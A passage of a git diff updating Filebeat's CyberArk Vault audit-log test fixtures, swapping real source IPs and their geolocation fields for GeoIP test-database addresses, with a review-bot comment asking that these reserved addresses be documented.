11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n 
PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set 
Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json index 40989a6cec03..bbc572cd230a 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json 
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/88_set_password.log-expected.json
@@ -195,7 +195,7 @@
 "cyberarkpas.audit.message": "Set Password",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:52",
 "event.action": "set password",
 "event.code": "88",
@@ -214,19 +214,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -241,7 +241,7 @@
 "cyberarkpas.audit.message": "Set Password",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:52",
 "event.action": "set password",
 "event.code": "88",
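Review bot: The new expectations in this hunk and in every later hunk of this file (through `@@ -756,23 +738,26 @@`) pin `source.geo.*` values (Bhutan at 27.5/90.5 for 67.43.156.x, London 51.5142/-0.0931 for 81.2.69.143) that are only stable against a fixed GeoIP test database, and nothing in the change records that. The old fixtures used live public addresses whose city-level lookups drift as the production GeoLite database is refreshed, which presumably is why they were swapped for these test-database addresses; a regeneration of this golden file against a production database would silently rewrite them back. Since a JSON fixture cannot carry a comment, state in the commit description, or next to the module's test fixtures, that `67.43.156.0/24` and `81.2.69.143` are reserved test-database addresses and that the expected geo fields depend on that database. The same convention should be noted for the `.log` inputs, so future fixture authors do not reintroduce real customer or cloud addresses into the audit samples.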
@@ -253,26 +250,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 3272, + "log.offset": 3271, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -287,7 +281,7 @@ "cyberarkpas.audit.message": "Set Password", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:55", "event.action": "set password", "event.code": "88", 
@@ -299,26 +293,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 3850, + "log.offset": 3848, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -333,7 +324,7 @@ "cyberarkpas.audit.message": "Set Password", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 10:46:47", "event.action": "set password", "event.code": "88", 
@@ -345,26 +336,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 4430, + "log.offset": 4427, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -379,7 +367,7 @@ "cyberarkpas.audit.message": "Set Password", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 10:46:47", "event.action": "set password", "event.code": "88", 
@@ -391,26 +379,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 4994, + "log.offset": 4990, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -425,7 +410,7 @@ "cyberarkpas.audit.message": "Set Password", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "35.192.121.42", + "cyberarkpas.audit.station": "67.43.156.12", "cyberarkpas.audit.timestamp": "Mar 10 14:20:12", "event.action": "set password", "event.code": "88", 
@@ -437,25 +422,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 5557, + "log.offset": 5552, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "35.192.121.42" + "67.43.156.12" ], "service.type": "cyberarkpas", - "source.address": "35.192.121.42", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "35.192.121.42", + "source.address": "67.43.156.12", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cyberarkpas.audit", "forwarded" @@ -470,7 +453,7 @@ "cyberarkpas.audit.message": "Set Password", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "35.192.121.42", + "cyberarkpas.audit.station": "67.43.156.12", "cyberarkpas.audit.timestamp": "Mar 10 14:20:12", "event.action": "set password", "event.code": "88", 
@@ -482,25 +465,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 6121, + "log.offset": 6115, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "35.192.121.42" + "67.43.156.12" ], "service.type": "cyberarkpas", - "source.address": "35.192.121.42", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "35.192.121.42", + "source.address": "67.43.156.12", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cyberarkpas.audit", "forwarded" @@ -513,10 +494,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:54Z", "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT", "cyberarkpas.audit.message": "Set Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Set Password\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 08:59:54", "event.action": "set password", "event.code": "88", 
@@ -528,26 +509,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 6684, + "log.offset": 6677, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -560,10 +538,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:55Z", "cyberarkpas.audit.issuer": "PSMPGW_VAGRANT", "cyberarkpas.audit.message": "Set Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Set Password\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 11 08:59:55", "event.action": "set password", "event.code": "88", 
@@ -575,26 +553,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 8094, + "log.offset": 8085, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -607,10 +582,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-11T20:10:33Z", "cyberarkpas.audit.issuer": "PSMApp_ASR-WIN", "cyberarkpas.audit.message": "Set Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 34.66.114.180\n \n \n \n \n \n Set Password\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.66.114.180", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 11 12:10:33", "event.action": "set password", "event.code": "88", 
@@ -622,25 +597,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 9502, + "log.offset": 9491, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.66.114.180" + "81.2.69.143" ], "service.type": "cyberarkpas", - "source.address": "34.66.114.180", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "34.66.114.180", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -653,10 +629,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:25Z", "cyberarkpas.audit.issuer": "PSMPGW_SSH", "cyberarkpas.audit.message": "Set Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 05:57:25", "event.action": "set password", "event.code": "88", 
@@ -668,23 +644,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 10910, + "log.offset": 10895, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.71.250.247" + "81.2.69.143" ], "service.type": "cyberarkpas", - "source.address": "34.71.250.247", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "34.71.250.247", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + 